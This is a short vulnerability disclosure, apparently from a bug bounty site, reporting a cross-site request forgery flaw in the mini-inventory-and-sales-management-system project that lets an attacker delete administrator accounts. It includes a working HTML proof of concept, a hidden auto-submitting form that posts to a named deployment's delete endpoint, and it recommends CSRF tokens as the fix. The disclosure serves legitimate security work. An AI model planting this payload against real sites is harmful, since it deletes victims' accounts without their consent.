Cross-Site Request Forgery (CSRF) in amirsanni/mini-inventory-and-sales-management-systemValid
Sep 7th 2021
Attacker is able to delete a administrator accounts if a logged in user visits attacker website.
🕵️♂️ Proof of Concept
1.when you logged in open this
POC.html in a browser(Firefox and Safari)
2.you can check unintentionally you delete an administrator account.
//POC.html <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://1410inc.xyz/mini-inventory-and-sales-management-system/administrators/delete" method="POST"> <input type="hidden" name="_aId" value="396" /> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
This vulnerability is capable of forging admin to unintentional delete an account.
Tested on Firefox and safari.
You should set a CSRF token on this requests.